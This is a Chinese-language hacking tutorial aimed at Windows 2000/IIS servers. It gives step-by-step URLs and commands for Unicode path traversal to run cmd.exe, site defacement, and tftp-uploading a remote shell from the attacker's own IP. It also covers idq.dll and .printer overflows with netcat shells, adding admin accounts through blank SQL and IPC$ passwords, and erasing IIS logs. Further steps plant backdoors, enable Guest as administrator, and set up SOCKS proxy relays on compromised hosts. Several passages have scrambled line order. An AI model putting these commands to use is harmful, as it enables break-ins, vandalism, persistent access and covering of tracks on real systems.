(一)系统基本知识
1.a.什么是IP:要是真
是所有Internet或是局域网
一个唯一的合法的IP地址,
法为XXX.XXX.XXX.XXX。有
所有的IP地址分为A、B、C
的想说清楚什么是IP,那是一项
上的主机的身份证。所有网络的
一台机器和别的指定的机器通讯
四段数字组成,第一段数字可为
、D、E五类,主要是A、B、C三
很繁重的工作。简单的来说,IP就
机器连接起来后,每台机器都会有
都要依据IP来实现的。IP地址的写
1-255,后三段数字可为0-255,且
类。其有效范围如下表所示:
类别 网络号 主机号
A 1~126 0~255 0~255 1~254
B 128~191 0~255 0~255 1~254
C 192~223 0~255 0~255 1~254
有关IP地址的问题可以
1查阅相关的资料,笔者在此就不
2
3再多耗笔墨了。呵呵
4
51.b.怎样得到自己和别
6winipcfg。接着,Windows
7IP 地址”会显示xxx.xxx.x
8件,不过最简单的使用Wind
9www.xxx.com。会出现:
10人的IP呢?以Windows 98为例:
11就会打开“IP 配置”。其中,
12xx.xxx,这就是你的IP。要想得
13ows自带的一个小程序ping.exe
14
15在“开始”—“运行”里输入:
16在“Ethernet 适配器信息”—“
17到别人的IP,可以使用一些工具软
18。在MS-DOS命令行下输入ping
19
20
21C:\>ping www.xxx.com
22
23
24Pinging www.xxx.com [xxx.xxx.xxx
25.xxx] with 32 bytes of data:
26
27
28Reply from xxx.xxx.xxx.xxx: byte
29s=32 time=630ms TTL=116
30
31Reply from xxx.xxx.x
32xx.xxx: bytes=32 time=630ms
33TTL=116
34
35Reply from xxx.xxx.xxx.xxx: byte
36s=32 time=120ms TTL=116
37
38
39Ping statistics for xxx.xxx.xxx.xxx:
40Packets: Sent = 4, R
41eceived = 4, Lost = 0 (0% lo
42ss),
43
44Approximate round tr
45ip times in milli-seconds:
46
47
48Minimum = 120ms, Max
49imum = 630ms, Average = 187m
50s
51
52
53其中:xxx.xxx.xxx.xxx 就是 http:
54//www.xxx.com的网络服务器的IP地址。
55
56
572.a.Unicode漏洞:“Unicode漏洞”
58。下面我们来简要介绍一下它的原理。
59是微软IIS的一个重大漏洞。2001年最热门漏洞之一
60
61
62IIS 4.0和IIS 5.0在Un
63过IIS执行任意命令。当IIS
64,如果用户提供一些特殊的
65。攻击者可以利用这个漏洞
66文IIS4.0+SP6开始,还影响
67同样存在这样的漏洞。(Wi
68icode字符解码的实现中存在一
69打开文件时,如果该文件名包含
70编码,将导致IIS错误的打开或
71来绕过IIS的路径检查,去执行
72中文WIN2000+IIS5.0、中文WIN2
73n NT4 编码为:%c1%9c ,Win20
74个安全漏洞,导致用户可以远程通
75Unicode字符,它会对其进行解码
76者执行某些web根目录以外的文件
77或者打开任意的文件。此漏洞从中
78000+IIS5.0+SP1,台湾繁体中文也
7900 英文版 编码为:%c0%af)
80
81
82假设目标主机为英文版
83我们在浏览器里输入:
84Winodows 2k,IP为xxx.xxx.xxx
85
86.xxx,且存在Unicode漏洞,那么
87
88
89http://x.x.x.x/scripts/..%c0%af.
90会显示如下内容:
91./winnt/system32/cmd.exe?/c+dir ,之后浏览器就
92
93
94Directory of C:\inetpub\scripts
952002-02-08 15:49 〈DIR〉 .
962002-02-08 15:49 〈DIR〉 ..
972002-02-08 10:20 Index.html
982002-02-08 10:20 background.jpg
99....................
100....................
101
102
103从上面的测试可以看出
104ystem32/cmd.exe?/c+"后就
105:"http://x.x.x.x/scripts/..
106是DOS命令了:"dir"
107%c0%af../winnt/s
108
109
110以此类推,我们可以利用浏览器远程执行任意命令,看下面的例子:
111在浏览器里输入http://x.x.x.x/scr
112stem32/cmd.exe?/c+dir+md+d:\Nature,
113ipts/..%c0%af../winnt/sy
114运行后我们可以看到返回这样的结果:
115
116
117CGI Error
118The specified CGI ap
119plication misbehaved by not
120returning a complete
121
122set of HTTP headers. The headers
123it did return are:
124
125
126英文意思是:
127CGI错误
128具体的CGI申请有误,不能返回完整的HTTP标题,返回的标题为:
129但是,你其实仍然在目
130标主机的 D:\ 里建立了一个名
131为:Nature的文件夹。
132
133
1342.b.利用Unicode漏洞我们还可以简单的修改目标主机的WEB文件。一般情况下,我们要修改目标主机的web文件,常用到的方法是利用echo回显、管道工具“>” “>>”。如果你对这些命令不熟悉,可以键入以下命令以查看帮助文档,如:
135
136C:\>echo/?
137
138显示信息,或将命令响应打开或关上。
139ECHO [ON | OFF]
140ECHO [message]
141仅键入 ECHO 而不加参数,可以显示当前的 ECHO 设置。
142
143
144管道工具“>” “>>” 的不同之处
145
146“>”“>>”是将命令产生的输出重新定向,比如写到某个文件或输出到打印机中。
147
148“>>”将产生的内容追加进文件中,“>”则将原文件内容覆盖。
149
150
151IIS加载程序检测到有cmd.exe或者command.com串就要检测特殊字符“&|(,;%<>”。如果发现有这些字符就会返回500错误,所以不能直接使用cmd.exe加管道符等。如果我们输入:http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+内容+> d:\cnhack.bat
152
153我们可以看到提示:
154
155HTTP 500 - 内部服务器错误
156Internet Explorer
157
158所以我们如果要echo和>的结合使用,就应该这样输入: http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+Hacked By Nature+> c:\inetpub\wwwroot\index.html (注意:这两个命令的区别是,后一个比前一个在cmd后多了一个"符号),完成后看它的主页已经被修改成了:Hacked By Nature 了。其实只要我们弄懂这个漏洞的使用,仅仅使用IE,我们就可以“黑”掉一个网站咯!就这么简单!
159
160
1613.idq.dll缓冲区溢出
162.dlls 。其中的 idq.dll
163文件)和Internet数据查询
164中存在一个未经检查的缓冲
165执行自己提供的代码。而更
166此漏洞后能取得系统管理员
167)Windows 2k和NT都受到了
168漏洞。作为安装过程的一部分,
169存在问题,它是 Index Server
170(.idq文件)提供支持。但是,i
171区。攻击者利用此漏洞能导致受
172为严重的是,idq.dll 是以 SYS
173权限。(SYSTEM权限相当于超级
174不同程度的影响。
175IIS 安装了几个 ISAPI 扩展
176的一个组件,对管理员脚本(.ida
177dq.dll 在处理一段URL输入的代码
178影响服务器产生缓冲区溢出,从而
179TEM 身份运行的,攻击者成功利用
180管理员权限,很值得注意!
181
1824.IIS.printer漏洞(应用程序映射
183仍有N台机器存在此漏洞。
184缓冲溢出):这也是近期比较流行的漏洞,国内国外
185
186
187微软Windows 2000 IIS
188射关系,缺省情况下该映射
189msw3prt.dll解释该请求。
190一个精心构造的针对.print
191msw3prt.dll中发生典型的
192响应,Win 2K可以检查到WE
193生过攻击。默认情况下,II
194使用位于\WINNT\System32\
195控制的网络打印的,是Wind
196序功能。不幸的是,这个映
197客通过web获取服务器的管
198的值达到420个字符时,就
1995的打印ISAPI扩展接口建立了.
200存在。当远程用户提交对.print
201由于msw3prt.dll缺乏足够的缓
202er的URL请求,其"Host:"域包含
203缓冲区溢出,潜在允许执行任意
204B服务停止响应,从而自动重启
205S 5.0服务器存在一个后缀为"pr
206下的名为 msw3prt.dll 的动态
207ows2000为Internet Printing P
208射存在一个缓冲区溢出错误,可
209理权限,黑客制造一个 .printe
210会发生缓冲区溢出:
211printer扩展名到msw3prt.dll的映
212er的URL请求时,IIS 5调用
213冲区边界检查,远程用户可以提交
214大约420字节的数据,此时在
215代码。溢出发生后,WEB服务停止
216它,因此系统管理员很难意识到发
217inter"的应用程序映射,这个映射
218库文件。这个功能是用于基于Web
219rotocol(IPP)协议而设置的应用程
220以导致inetinfo.exe出错,允许黑
221r 的ISAPI请求,当Http host参数
222
223
224GET /NULL.printer HTTP/1.0
225Host: [buffer] <\-------------
226目达到420时,缓冲区溢出。这时,Web服
227\--------------------当上述 [buffer]值的字符数
228务器会停止响应
229
230
231Windows2000操作系统发现Web异常停
232的脚本, 黑客可以以system用户的身份
233害比IISHACK更大,原因是由于IIS4.0不
234,而通过这个漏洞,黑客可以不停地利用
235程序,可以绑定系统的cmd.exe程序,从
236止后,会自动重启。通过构造包含适当的Shell Code
237,不停地远程通过web执行任何指令。这个漏洞的危
238自动重启的原因,用IIShack黑客只能获得一次Shell
239。目前Internet上已经有了针对这个漏洞的exploit
240而自由地执行指令。
241
242
2435.MSSQL空密码漏洞:S
244不少。超级管理员sa的默认
245据库,通常采用IIS作为网
246务器目前最高的版本是2000
247置不当,将对NT系统本身造
248SQL 2000以前的版本在默认
249是为Windows NT系统打开了
250QL服务器是一个非常强大的数据
251密码为空,就是一个重大漏洞。
252络服务器的NT服务器均采用SQL
253,但是通常比较常见的是6.5和7
254成很大的危害,在一般情况下都
255安装时的密码均为空,如果在安
256一道后门。
257库。当然,这么庞大的程序漏洞也
258SQL Server是运行于NT平台上的数
259服务器作为数据库服务器。SQL服
260.0(包括SP1)。SQL服务器如果配
261可以直接获得超级用户的权限。
262装的时候没有及时修改密码,无疑
263
264有关于系统漏洞的知识
265手干了啊!OK,Let's Go!
266就先讲到这里。下面我们来看看
267
268怎么在实战中取得胜利,就是要动
269
270(二)实战演练阶段
271
2721.Unicode漏洞实战篇(文中所提到的
273软件均可在黑白网络www.521hacker.com下载到。)
274
275还记得我们在第一部分介绍的Unicod
276就先来看看利用Unicode漏洞和tftp来上
277说,tftp 就是让你的电脑变成一台服务
278传的目的。在运行tftp32.exe之前,建议
279已经是一个FTP服务器了。然后,把你要
280在地址栏里输入:
281e漏洞吗?可别告诉你没有什么印象啊!呵呵,我们
282传文件的方法。也许你会问,什么是tftp呢?简单来
283器,让目标主机来下载你的文件,这样就可以达到上
284关闭其他FTP服务器,保持tftpd运行,这时你的机器
285上传的文件,复制到同一目录下。回到你的浏览器,
286
287http://x.x.x.x/scrip
288GET icmd.exe c:\\\inetpub
289ts/..%c0%af../winnt/system32
290\\\scripts\\\icom.exe
291/cmd.exe?/c+tftp -i y.y.y.y
292
293
294y.y.y.y为你自己的IP
295c:\\\inetpub\\\scripts\\\为
296icmd.exe(名字自己起吧)
297消失,这时icmd.exe已经上
298行icom.exe(icmd.exe),在
299,注意:c:\\\inetpub\\\scripts
300主机服务器目录,要看主机的具
301。然后等待...大概N分钟...IE
302传到主机c:\inetpub\scripts\
303地址栏输入:
304\\\icom.exe,用"\\\"隔开。 其中
305体情况而定,icom.exe为被改名的
306浏览器左下角显示完成,红色漏斗
307目录了。您可以自己检查一下。执
308
309
310http://x.x.x.x/scrip
311netpub\scripts\icom.exe
312ts/..%c0%af../winnt/system32
313,如果有提示,那表示上传成功
314/cmd.exe?/c+c:\i
315!
316
317
318好的,下面我们再来谈
319设目标主机存在Unicode漏
320winserver.exe(这样比较
321谈用利用Unicode漏洞结合Winsh
322洞。还是用tftp来上传winshell
323隐蔽嘛!),然后在浏览器里输
324ell来取得SYSTEM权限的实例。假
325.exe,并将其改名成
326入:
327
328http://xxx.xxx.xxx.x
329?/c+c:\inetpub\scripts\w
330xx/scripts/..%c0%af../winnt/
331inserver.exe
332system32/cmd.exe
333
334
335(这时候,浏览器可能像没有响应一
336暂时不要关闭浏览器)
337样,许久没有反应,但是,这个程序已经启动了,请
338
339好的,现在我们就可以
340默认打开的端口)
341telnet上去了:telnet xxx.xxx
342
343.xxx.xxx 5277 (5277是winshell
344
345
346WinShell v1.0 - '!'
347to quit, 'enter' to shell...
348
349
350Microsoft(R) Windows NT(TM)
351(C) Copyright 1985-1996 Microsof
352t Corp.
353
354C:\Inetpub\scripts> <\----------------------太好了,我们成功了!现在,你已经具有SYSTEM权限了,可以为所欲为咯!像在DOS下一样!
355
356
357在黑别人主页的时候是
358受到攻击,就把WEB文件的
359打service park(补丁包,
360WEB文件存放的位置。我们
361//xxx.xxx.xxx.xxx/Nature
362不是遇到过找不到WEB文件存放
363存放位置改了。这可苦了我们啊
364简称SP),那么它就存在一个ida
365在浏览器里输入一个不存在的.i
366.ida,接着,浏览器就会返回如
367位置的情况?有时候网管为了避免
368,没关系,只要是它的2K或NT没有
369漏洞,攻击者利用此漏洞可以得到
370da文件,如:http:
371下的提示:
372
373找不到IDA文件在 D:\Inetpub\wwwro
374ot\Nature.ida
375
376其中,“D:\Inetpub\w
377
378wwroot\”就是目标主机存放WEB
379
380文件的地方了。呵呵,黑了它吧!
381
382攻击完成之后,我们就要擦PP了,要不被警察叔叔拉去玩,可就不好了,对吧?
383用tftp把CleanIISLog.
384下执行CleanIISLog.exe就
385。PP擦完后走人!
386exe传到目标主机上去,再利用w
387可以了(有关CleanIISLog的用
388
389inshell telnet 上去,在命令行
390法,请参见程序附带的帮助文档)
391
3922.idq.dll漏洞实战篇 这次是利用id
393IIS IDQ 溢出程序、Netcat(即NC),有关
394绍了。
395q.dll漏洞溢出SYSTEM权限。要用到的程序有:Snake
396软件的使用方法,详见帮助文档,笔者在此就不都介
397
398假设我们的目标主机是
399IDQ 溢出程序为例介绍。
4002K,有无打SP不清楚。我们以GU
401
402I(图形界面)版的Snake IIS
403
404设置:被攻击地址:IP:xxx.xxx.xx
405x.xxx Port(端口):80
406
407溢出选项:选择“溢出后,在一个端口监听”
408监听端口:813
409要绑定的命令:cmd.exe /c dir c:\
410操作系统类型:IIS5 Chinese Win2k
411设置完成之后,点击“IDQ溢出”,
412xxx.xxx.xxx.xxx :80 OK”。
413完成。程序会提示“发送shellcode 到
414
415
416接着进入MS-DOS方式。
417以下面的方式运行NC:nc --v x
418xx.xxx.xxx.xxx 80
419
420
421C:\>nc -vv xxx.xxx.xxx.xxx 813
422
423xxx.xxx.xxx.xxx: inverse host lo
424okup failed: h_errno 11004: NO_DATA
425
426(UNKNOWN) [xxx.xxx.xxx.xxx] 813
427(?): connection refused
428
429sent 0, rcvd 0: NOTSOCK
430D:\>
431
432
433呵呵,没有成功哦,可能是打了SP1
434Chinaese Win2K SP1”,重复以上步骤。
435吧,那我们就在“操作系统类型”里选“IIS5
436
437C:\>nc -vv xxx.xxx.xxx.xxx 813
438
439xxx.xxx.xxx.xxx: inverse host lo
440okup failed: h_errno 11004: NO_DATA
441
442(UNKNOWN) [xxx.xxx.xxx.xxx] 813
443(?) open
444
445Microsoft Windows 20
44600 [Version 5.00.2195]
447
448
449(C) Copyright 1985-2
450000 Microsoft Corp.
451
452
453
454C:\WINNT\system32> <\-----------------我们终于成功了!你已经获得SYSTEM权限了,又可以为所欲为了,可不要乱来哦:)
455
456
4573.IIS.printer漏洞实战篇(用到的
458NC) 。有关IIS5HACK的用法参见帮助。)
459程序有:IIS5hack(.printer溢出工具), Netcat(即
460
461
462关于IIS5HACK程序中部分单词解释:
463HostType:主机操作系统类型。ShellPort
464Host:溢出主机的IP地址。HostPort:主机端口。
465:溢出的端口
466
467现在我们开始吧。假设目标主机为2K
468系统,且存在IIS.printer漏洞。示例如下:
469
470C:\>iis5hack xxx.xxx.xxx.xxx 80 1 3739
471
472IIS5 remote .printer overflow. w
473riten by sunx
474
475http://www.sunx.org
476for test only, dont used to hack, :p
477Listn: 80
478connecting...
479sending...
480Now you can telnet to 3739 port
481good luck :)
482
483OK!溢出成功!接着用NC连接它的3739端口:
484
485C:\>nc xxx.xxx.xxx.xxx 3739
486
487http://www.sunx.org
488Microsoft Windows 20
48900 [Version 5.00.2195]
490
491
492(C) 版权所有 1985-2000 Microsoft Corp.
493
494C:\WINNT\system32> <\-------------------------接着键入:whoami查询用户身份:
495
496
497c:\WINNT\system32>whoami
498
499SYSTEM <\---------------------
500限!
501\----------------看见了吗?我们成功取得system权
502
5033.MSSQL空密码漏洞实战篇(用到的软件:流光FluxayIV)
504
505a.利用SQL空密码添加超级用户
506开始吧!运行流光4,按Ctrl+R,出现
507点确定。一会后,假设我们扫到了一台SQ
508击用户名,流光会出现连接的提示,点击
509:
510主机扫描设置,填入IP地址,扫描主机类型选SQL,
511L密码为空的主机,流光会自动将用户加入列表,点
512即可连接。现在你可以添加一个用户(SYSTEM权限)
513
514net user Nature 1234
515密码为1234567890的用户
51656 /add <\----------------
517
518\---------添加一个名字为Nature,
519
520
521net localgroup administrators Na
522用户加到管理员组里,你也是管理员了哦
523ture /add <\-----------把你刚才添加的Nature
524!~~~~~~
525
526
527b.SQL空密码结合PCAnyWhere获得目标主机的完全管理权
528检查一下目标主机是否
529,如果取得他的帐号和密码
530情况下,PCAnyWhere安装于
531过的帐号和密码。只要得到
532出密码了!用流光扫描该主
533机名了。点击该主机后,流
534WEB服务器(可以是免费空间
535成功。我们再从我们的个人
536选择框,选中那个.cif文件
537!现在打开PCAnyWhere Man
538network host pc to contr
539login information项中的a
540login name和password栏中
541等片刻即可看到了对方桌面
542开有5631端口,如果有的话,说
543,我们不就是可以用PcAnyWhere
544c:\Program Files目录下,其da
545此文件,就可以用流光自带的PC
546机,如果有PCAnyWhere文件,那
547光会有连接提示,点击后即可出
548)的ftp地址,用户名和密码,点
549主页上将那个.cif文件下载下来
550,单击确定,流光的PCAnyWhere
551ager,建立一个指向xxx.xxx.xx
552ol or ip adress, 并添上目标i
553utomatically login to host u
554填入刚才得到的用户名和密码,
555。呵呵!又搞定咯!抓抓里面的
556明目标主机有PCAnyWhere远程管理
557来远程管理目标主机了吗?!默认
558ta目录下的.cif文件中保存着加密
559AnyWhere密码文件解码器来快速解
560么在流光主机详细列表中就会有主
561现连接对话框。在其中填上你的
562击确定,过一会,流光会提示上传
563。然后在流光中按Ctrl+T调出文件
564密码文件解码器就会很快解出密码
565x.xxx的通道。在setting项中选择
566p:xxx.xxx.xxx.xxx ,选中
567p connection ,并在下面的
568确定即可。双击新建立的通道,稍
569好东东吧!
570
571
5724.IPC$共享弱密码漏洞篇(用到的软
573目录下有)
574件:流光FluxayIV,srv.exe、ntlm.exe流光的tools
575
576
577IPC$是Windows的默认共享。我们可
578享并没有什么漏洞。问题就出在管理员密
579主机密码设置为“空”或者“123”等简
580猜解管理员的密码,得到目标主机的超级
581是不是很惊讶?来吧,开始入侵!Go Go
582以用主机的管理员用户名和密码连接。其实,这个共
583码上了。直至现在为止,世界上起码有20%的人,把
584单密码。而这就是个致命的共享漏洞。我们可以通过
585管理员权限, 就可以将目标主机完全控制了!呵呵!
586Go !!!
587
588
589如果你得到了SQL的管
590,使用如下命令:
591理员密码,你就可以通过IPC$连
592
593接到目标主机了。在命令提示符下
594
595C:\>net use \\\xxx.xxx.xxx.xxx\IPC$ "" /user:"administrator" <\---------------------------使用猜解到的管理员登陆到目标主机
596
597命令成功完成。
598
599C:\>copy srv.exe \\\xxx.xxx.xxx.xxx\admin$ <\---------------------------------------------复制srv.exe到目标主机
600
601已复制1个文件。
602
603C:\>net time \\\xxx.xxx.xxx.xxx <\--------------------------------------------------------用net time命令查查服务器的本地时间
604
605\\\xxx.xxx.xxx.xxx 的当前时间是 2
606002/2/11 上午 9:30
607
608
609命令成功完成。
610
611C:\>at \\\xxx.xxx.xxx.xxx 9:35 srv.exe <\-------------------------用at命令远程启动srv.exe(这里设置的时间要迟于目标主机时间)
612
613新加了一项作业,其作业 ID = 1
614
615过了几分钟后,可以再查查目标主机
616就可以telnet上去了,默认端口是99
617的时间到了我们设置的时间了没有,如果到了,我们
618
619C:\>telnet xxx.xxx.xxx.xxx 99
620
621
622Microsoft Windows 2000 [5.00.2195]
623(C) Copyright 1985-1
624999 Microsoft Corp.
625
626
627
628C:\WINNT\system32 <\----------
629\-----------------------------------成功了!
630
631
632C:\>copy ntlm.exe \\\xxx.xxx.xxx.xxx\admin$ <\----再开一个命令行窗口,把ntlm.exe(修改Windows 2K Telnet身份验证)传到目标主机上
633
634
635回到刚才开的telnet的窗口
636Microsoft Windows 2000 [5.00.2195]
637(C) Copyright 1985-1
638999 Microsoft Corp.
639
640
641
642C:\WINNT\system32\ntlm.exe <\-
643!
644\-----------------------------------启动ntlm吧
645
646
647Windows 2000 Telnet Dump, by Ass
648assin, All Rights Reserved.
649
650
651Done! <\----------
652取消了2000的身份验证!
653\----------------------------
654
655\-------------------好了,成功
656
657C:\WINNT\system32\ne
658\-------------------用net
659t start telnet <\---------
660start命令直接启动telnet服务
661\----------------
662吧
663
664Telnet 服务正在启动...
665Telnet 服务已经启动。
666
667键入exit,切断和目标
668主机的telnet连接,然后再次te
669lnet到目标主机:
670
671
672C:\WINNT\system32\telnet xxx.xxx
673\---------------------------这次直接
674.xxx.xxx <\-----------
675连接默认端口23就可以了!
676
677login:administrator
678Password: <\------------------
679\---------------------------密码为空
680\------------------------
681的就不打了,呵呵!~~
682
683其实在这样登陆后,为
684路,那就是留后门啦:
685了以后我们还可以重复利用这台
686
687主机,我们应当学会给自己留条后
688
689C:\>WINNT\system32\copy srv.exe c:\inetpub\scripts <\--------------------留个后门
690
691C:\>WINNT\system32\cmd.exe c:\inetpub\scripts\winserver.exe <\-----------还留一个,有备无患嘛!
692
693
694C:\>net user Guest /active:yes <\----------------------------------------激活Guest用户
695
696C:\net user Guest 12
697Guest的密码改为123456789
69834567890 <\---------------
6990,你可以随意设置
700\---------------------------将
701
702
703C:\>net localgroup administrators Guest /add <\--------------------------将Guest加入超级管理员组,你就是administrator了^_^
704
705
706好了,后门也留够了,
707改,你就可以用Guest来登
708这下可以放心了。下次如果管理陆目标主机了!
709员的密码改了,只要Guest没有修
710
7115.Sock5代理跳板篇(
712作工具)
713用到的程序:sksockserver.exe
714
715,由Snake制作的sock5代理跳板制
716
717
718经常有朋友会问起关于Sock5代理的
719必要在这里介绍一下(Sock5代理真的很
720问题,可见大家都对它很感兴趣,所以我觉得还是有
721有用哦)
722
723代理跳板的原理,可以参见以下的示意图:
724
725加密数据 加密数据 普通数据
726[]=======[]=======[]
727=======[]========[]=:::=[
728]=======[]
729
730工作站 跳板1 跳板2 跳板3 跳板4 跳板N 目标机
731
732好的,开始制作Sock5
733密码漏洞篇。然后进入命令
734代理跳板咯!先用IPC$登陆到目
735提示符状态:
736标主机上,方法见上文IPC$共享弱
737
738C:\>copy c:\snake\Sksockserver.exe \\\xxx.xxx.xxx.xxx\c$\admin$ <\----------------将sksockserver.exe拷贝到目标主机
739
740C:\>telnet xxx.xxx.xxx.xxx <\------------------------telnet到目标主机上去。如果没开telnet,参见上文打开telnet服务
741
742Microsoft (R) Windows 2000 (TM)
743Version 5.00 (Build 2195)
744
745Welcome to Microsoft Telnet Client
746Telnet Client Build 5.00.99203.1
747
748Escape Character is 'CTRL+]'
749
750You are about to sen
751d your password information
752to a remote computer
753
754in Internet zone. Th
755
756is might not be safe. Do you
757
758want to send it anyway(y/n):y
759
760
761NTLM Authentication
762failed due to insufficient c
763redentials.
764
765Please login with
766clear text username and password
767Microsoft (R) Windows (TM) Versi
768on 5.00 (Build 2195)
769
770Welcome to Microsoft Telnet Service
771Telnet Server Build 5.00.99201.1
772login:administrator
773password: ********** <\-------
774密码
775\----------------------此处输入你得到的管理员的
776
777
778*===============================
779===========================
780
781Microsoft Telnet
782*===============================
783===========================
784
785C:\> <\---------------------------------------------登陆成功了,现在要安装sksockserver程序了!
786
787
788C:\>sksockserver.exe <\-----------------------------不带任何参数就会显示帮助文档。好好看看吧!
789
790SkServer - is freeware, All Righ
791ts Reserved by snake.2001.
792
793Run with paramater below list:
794-Install (Install the service)
795-Remove (Remove the service)
796-Debug 1813 (Run as console prog
797ram at port 1813)
798
799
800~ Next are about ser
801vice registry value setting
802~
803
804-config Show [Port/StartType/Cli
805ent/SkServer] (Show current config)
806
807-config Port [NewPort] (Set/Show
808SkServer's Port)
809
810-config StartType [1~3] (Set/Sho
811w StartType)
812
813( 2-Auto, 3-Manual, 4-Disable)
814-config Client [add/del/change]
815[IP Mask Enable]
816
817(Show/add/del/change Client Set)
818-config SkServer [add/del/change
819] [IP Port Enable]
820
821(Show/add/del/change Pass Skserv
822er Set)
823
824
825C:\>sksockserver -install <\------------------------好的,现在开始安装!
826
827如果你想来个连跳,那么安装后还要做一下设置。先看看默认设置情况:
828C:\>sksockserver -config show
829
830SkServer Port = 1080 <\-------
831\----------------------开放服务的端口
832
833SkServer StartType:
8343 - Manual <\-------------
835\------服务启动方式
836
837SkServer Enable Clie
838nt Set Num:0 <\-----------
839\------客户端的项目个数
840
841SkServer Pass SkServer Number:0
842<\------------------经过SkServer的项目个数
843
844
845如何设置连跳:
846c:> SkSockServer -config client'ip [add/del] === [显示/增加/删除 客户端的项目]
847
848c:> SkSockServer -config SkServer'ip [add/del] === [显示/增加/删除 经过SkServer的项目]
849
850
851C:\>net start skserver <\---------------------------启动服务了!!!!!!!!!!!
852
853
854C:\>net start <\------------------------------------检查是否启动成功!
855
856These Windows 2000 s
857动的服务
858ervices are started: <\---
859
860\------显示目标主机上所有的已启
861
862......
863Snake SockProxy Serv
864了!
865ice <\--------------------
866
867\------好的,就是它,已经开始工作
868
869
870Telnet
871......
872
873The command complete
874d successfully. <\--------
875\------命令成功执行!
876
877
878C:\> <\---------------------------------------------到此,我们的Sock5代理跳板就做好了。不光可以用来当肉鸡用,还可以上QQ呢